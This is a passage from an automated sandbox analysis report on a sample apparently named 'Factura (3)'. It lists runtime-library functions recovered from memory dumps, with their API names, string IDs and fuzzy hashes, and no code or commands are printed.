                                                      • Instruction Fuzzy Hash: 53717122B04A12A5FB58BF62F4D46BCB3B0BF48748F944035CA0D87694EF3CA445E362
                                                      Function 00007FF7340E7EF4 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: d19bad5b4149b7e27de2a496e9a3d1a2f1296f805ecff6a13cfba9047ef33984
                                                      • Instruction ID: ca31a87f74263e3c6bad8cdf624fa7a0f49112cbf61939a590599efaf847a021
                                                      • Opcode Fuzzy Hash: d19bad5b4149b7e27de2a496e9a3d1a2f1296f805ecff6a13cfba9047ef33984
                                                      • Instruction Fuzzy Hash: 1F319276704F8195EB68AF61E8843EEB364FB84704F844039DA4D87B98EF38D548C720
                                                      Function 00007FF7340EE0B0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 230611baea903533cf9bb5d312c93900b6b9e6109fced0a0c30f2c7fd838c35a
                                                      • Instruction ID: b3e7c8abec963c4e09fdbfa7504433d2f300c8197832ef507a2729dfd53a3374
                                                      • Opcode Fuzzy Hash: 230611baea903533cf9bb5d312c93900b6b9e6109fced0a0c30f2c7fd838c35a
                                                      • Instruction Fuzzy Hash: 5031B736614F8195DB68DF26E8843AEB3A0FB88754F900135EA8D83B58DF3CC555CB10
                                                      Function 00007FF7340F36A0 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: memcpy_s
                                                      • String ID:
                                                      • API String ID: 1502251526-0
                                                      • Opcode ID: 8101bab96facb9530bfb020494a0e1e968264cdbe7156957248635d7c5768935
                                                      • Instruction ID: c140be54eabaf33a1fb84582b153fd90abccb46ecdd6c512e9b447c4073055d3
                                                      • Opcode Fuzzy Hash: 8101bab96facb9530bfb020494a0e1e968264cdbe7156957248635d7c5768935
                                                      • Instruction Fuzzy Hash: A5C1F672B1A68697D728DF26A0C466AF7D1F784B94F849134DB4E83B44DB3DE801DB40
                                                      Function 00007FF734103C2C Relevance: 4.7, APIs: 3, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1791019856-0
                                                      • Opcode ID: e43832b548c7097fac0086db128b2c51769759b4f55086baf550708979e3ed8f
                                                      • Instruction ID: 4ae683a8b5b97bce8c3a8da3d61c255b76f11e8de17bcf5342568f8020d0099a
                                                      • Opcode Fuzzy Hash: e43832b548c7097fac0086db128b2c51769759b4f55086baf550708979e3ed8f
                                                      • Instruction Fuzzy Hash: 66619F72B08946A6EB38AF12E4C9279B3A1FB44740FD08135CB9EC3695DF3CE451A711
                                                      Function 00007FF7340F85D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      • Opcode ID: 9daee3a364d8e272c3e2a1ad95b3304e04898eef4982e5d85e6ca0f4b3a42952
                                                      • Instruction ID: a8c00bd16e4c6c6f61f6a07b3633f8ce8b9e937b5abf1c04ab52113382f01150
                                                      • Opcode Fuzzy Hash: 9daee3a364d8e272c3e2a1ad95b3304e04898eef4982e5d85e6ca0f4b3a42952
                                                      • Instruction Fuzzy Hash: 9B01A721B08A41A5EB48AF57B4C00E6E3A0BF88BD0FA84035EE4D83B96CF3CD5519750
                                                      Function 00007FF7340FD2AC Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise_clrfp
                                                      • String ID:
                                                      • API String ID: 15204871-0
                                                      • Opcode ID: c5a1392ec85042110efb5c4722f213e26158db9632c603e7c8e086f3832f9200
                                                      • Instruction ID: 1eea7dad31d2609b3d952c5cceadfa92697af2ee78d967885cc4fd61ba87f850
                                                      • Opcode Fuzzy Hash: c5a1392ec85042110efb5c4722f213e26158db9632c603e7c8e086f3832f9200
                                                      • Instruction Fuzzy Hash: DDB13A73605B888BE719DF2AC48636C7BE0FB84B48F548971DA6E837A4CB39E451D710
                                                      Function 00007FF7340FBEBC Relevance: 2.6, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: e+000$gfff
                                                      • API String ID: 0-3030954782
                                                      • Opcode ID: d8387caefaf1f46e1e78c5f1f3996a01e46ef952bc5d5a465fd1b176532bda17
                                                      • Instruction ID: 4f1a5a691bb4ce619a47705e7747e27e5816a4a057069a1083cfa6ab9bacc4c1
                                                      • Opcode Fuzzy Hash: d8387caefaf1f46e1e78c5f1f3996a01e46ef952bc5d5a465fd1b176532bda17
                                                      • Instruction Fuzzy Hash: 32518632B1C6C592E3289E36D8C1769FBD1F744B94F888271CB988BAC1CE3DD0459B10
                                                      Function 00007FF7340F2D5C Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-0
                                                      • Opcode ID: c005bcde806c81e01e4df15f4c99a6f95a7328643ee6b1bc17a401133939a732
                                                      • Instruction ID: ba16b80fcf6783ca86c082abcc1d63ed216dd32ecc1852bcd256eaf7f76c8bea
                                                      • Opcode Fuzzy Hash: c005bcde806c81e01e4df15f4c99a6f95a7328643ee6b1bc17a401133939a732
                                                      • Instruction Fuzzy Hash: D312CE23A09BC196E755DF3994842FDB3A4FB58748F859235EF8C82252EF39E191D310
                                                      Function 00007FF734101CC8 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3efa0f99a68f6d077aae937ba255fcdfc0d0867bb13be87dbcd7bc95160b0958
                                                      • Instruction ID: f64a204c11366a76130594eed4092b251fe045c8c3a70ebcefae3221149ec106
                                                      • Opcode Fuzzy Hash: 3efa0f99a68f6d077aae937ba255fcdfc0d0867bb13be87dbcd7bc95160b0958
                                                      • Instruction Fuzzy Hash: 17E19F32B05B4596E764EF62E4842EAB3A0FB54788F804A31DF8D93B56EF38D245D350
                                                      Function 00007FF7340FFC58 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6281e910912a6cfbeaf9960c516ad5ff87d0ff842b0a372a57855e2d97aa7087
                                                      • Instruction ID: 36ff6bb37fa65da2fe893ed3dcd8234522b658290d8fc2f046c20fa34c8e7c35
                                                      • Opcode Fuzzy Hash: 6281e910912a6cfbeaf9960c516ad5ff87d0ff842b0a372a57855e2d97aa7087
                                                      • Instruction Fuzzy Hash: B3510422B04691A5EB24AF73A8C01AABBE0FB40BD8F944135EE5CA7B95DF3CD001D700
                                                      Function 00007FF734103E74 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue$InfoLocale
                                                      • String ID:
                                                      • API String ID: 673564084-0
                                                      • Opcode ID: 2259915dec17588e9ea898bb242dc15a1737256904b3d86cf7f8077ed11d6a6f
                                                      • Instruction ID: a848873a9fcc00fff5ea80fc862ae947e40f9f6fef8112e1943d5be6213533aa
                                                      • Opcode Fuzzy Hash: 2259915dec17588e9ea898bb242dc15a1737256904b3d86cf7f8077ed11d6a6f
                                                      • Instruction Fuzzy Hash: E2319531B08A8692EB2CEF22E4C53A9B3A1FB48780F944075DA5DC3295DF3CE4109711
                                                      Function 00007FF734103AC4 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7340F7D04: GetLastError.KERNEL32 ref: 00007FF7340F7D13
                                                        • Part of subcall function 00007FF7340F7D04: FlsGetValue.KERNEL32 ref: 00007FF7340F7D28
                                                        • Part of subcall function 00007FF7340F7D04: SetLastError.KERNEL32 ref: 00007FF7340F7DB3
                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7341042B3,?,00000000,00000092,?,?,00000000,?,00007FF7340F5F4D), ref: 00007FF734103B62
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                      • String ID:
                                                      • API String ID: 3029459697-0
                                                      • Opcode ID: 490fd993a3ca1620ce3054d0c9aa99974cfa47cf1976db74365dba7094ea533c
                                                      • Instruction ID: e3fb5ab8f9c9237883bdf1a9cbde2728891b8524dce48205c70bed1750710e84
                                                      • Opcode Fuzzy Hash: 490fd993a3ca1620ce3054d0c9aa99974cfa47cf1976db74365dba7094ea533c
                                                      • Instruction Fuzzy Hash: F9112763A08A099AEB189F16E0C42B8B7A0F740FA4F948136C62D833C0CE38D5D1D751
                                                      Function 00007FF73410407C Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7340F7D04: GetLastError.KERNEL32 ref: 00007FF7340F7D13
                                                        • Part of subcall function 00007FF7340F7D04: FlsGetValue.KERNEL32 ref: 00007FF7340F7D28
                                                        • Part of subcall function 00007FF7340F7D04: SetLastError.KERNEL32 ref: 00007FF7340F7DB3
                                                      • GetLocaleInfoW.KERNEL32(?,?,?,00007FF734103E26), ref: 00007FF7341040B3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocaleValue
                                                      • String ID:
                                                      • API String ID: 3796814847-0
                                                      • Opcode ID: 18ec120d268a612de98668fcb0c0a0fe0cc80bda041a06f35387ff7d825c6faf
                                                      • Instruction ID: d3f8aa08c3b49df12407e7a918a33a6db0600d563f865ee155db561bc6af1fbd
                                                      • Opcode Fuzzy Hash: 18ec120d268a612de98668fcb0c0a0fe0cc80bda041a06f35387ff7d825c6faf
                                                      • Instruction Fuzzy Hash: AC115B32B0896293E77CAF16B0C967AA261EB50750FA44231D62D836C4DF3AE881B711
                                                      Function 00007FF734103B94 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7340F7D04: GetLastError.KERNEL32 ref: 00007FF7340F7D13
                                                        • Part of subcall function 00007FF7340F7D04: FlsGetValue.KERNEL32 ref: 00007FF7340F7D28
                                                        • Part of subcall function 00007FF7340F7D04: SetLastError.KERNEL32 ref: 00007FF7340F7DB3
                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF73410426F,?,00000000,00000092,?,?,00000000,?,00007FF7340F5F4D), ref: 00007FF734103C12
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                      • String ID:
                                                      • API String ID: 3029459697-0
                                                      • Opcode ID: 1e0b5c7e9ffc082fb4dec5f6f6ff111364930e96f4d260281a5350d95095e18f
                                                      • Instruction ID: b985fa8535472e4aec509d34ba6701bad342b7a6644842e5b6394fb0f6a9466d
                                                      • Opcode Fuzzy Hash: 1e0b5c7e9ffc082fb4dec5f6f6ff111364930e96f4d260281a5350d95095e18f
                                                      • Instruction Fuzzy Hash: 4201F972F0854956E7186F17F485779B6D1FB407A4F909332C269872C4DF7C9480A711
                                                      Function 00007FF7340F8150 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7340F859F,?,?,?,?,?,?,?,?,00000000,00007FF734103114), ref: 00007FF7340F819F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2099609381-0
                                                      • Opcode ID: f6e7ef5577b9fcd03321606314a6befe81917b966e35fd28f13048e57d68bc30
                                                      • Instruction ID: e8ef795b3188204f6d89412cf9dfcfa1b6aa0a72596ed60e0ecebef79f0f211c
                                                      • Opcode Fuzzy Hash: f6e7ef5577b9fcd03321606314a6befe81917b966e35fd28f13048e57d68bc30
                                                      • Instruction Fuzzy Hash: 87F04676B08E41A2E608AF26F8C05A9A3A5EB88BC0F948035DA4DC3364CF3CE4619654
                                                      Function 00007FF7340F267C Relevance: 1.5, APIs: 1, Instructions: 28timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem
                                                      • String ID:
                                                      • API String ID: 2086374402-0
                                                      • Opcode ID: c3d3b7f89fc1c737c09a73c3b44ca0f8d286e7656c93a07c611ae9a08fd26ba8
                                                      • Instruction ID: 1e7e21dd3e160c5f011494f102107e8c8bd1e51a63da794a251bdaf6f642ca72
                                                      • Opcode Fuzzy Hash: c3d3b7f89fc1c737c09a73c3b44ca0f8d286e7656c93a07c611ae9a08fd26ba8
                                                      • Instruction Fuzzy Hash: B5F02ED5B29A8C03ED189B16D45436492819F5CBF4F409331ED3D4E7C9FE1DD0509700
                                                      Function 00007FF7340FBA28 Relevance: 1.5, Strings: 1, Instructions: 254COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: gfffffff
                                                      • API String ID: 0-1523873471
                                                      • Opcode ID: 0bc6bd9648928d7ecb50589521e13798d0381c58328b1a8c8b3ed005ec4c65f8
                                                      • Instruction ID: 65f3fdba4d711e3e1a60406dd4854ebbadc5f19c04ca08dd7c5c01ad3cbd0ad6
                                                      • Opcode Fuzzy Hash: 0bc6bd9648928d7ecb50589521e13798d0381c58328b1a8c8b3ed005ec4c65f8
                                                      • Instruction Fuzzy Hash: 5CA18932B1978696EB29DF2690C07AABBE1EB50784F448071DE8D87785EE3CD501DB11
                                                      Function 00007FF7340F0D9C Relevance: 1.5, Strings: 1, Instructions: 247COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
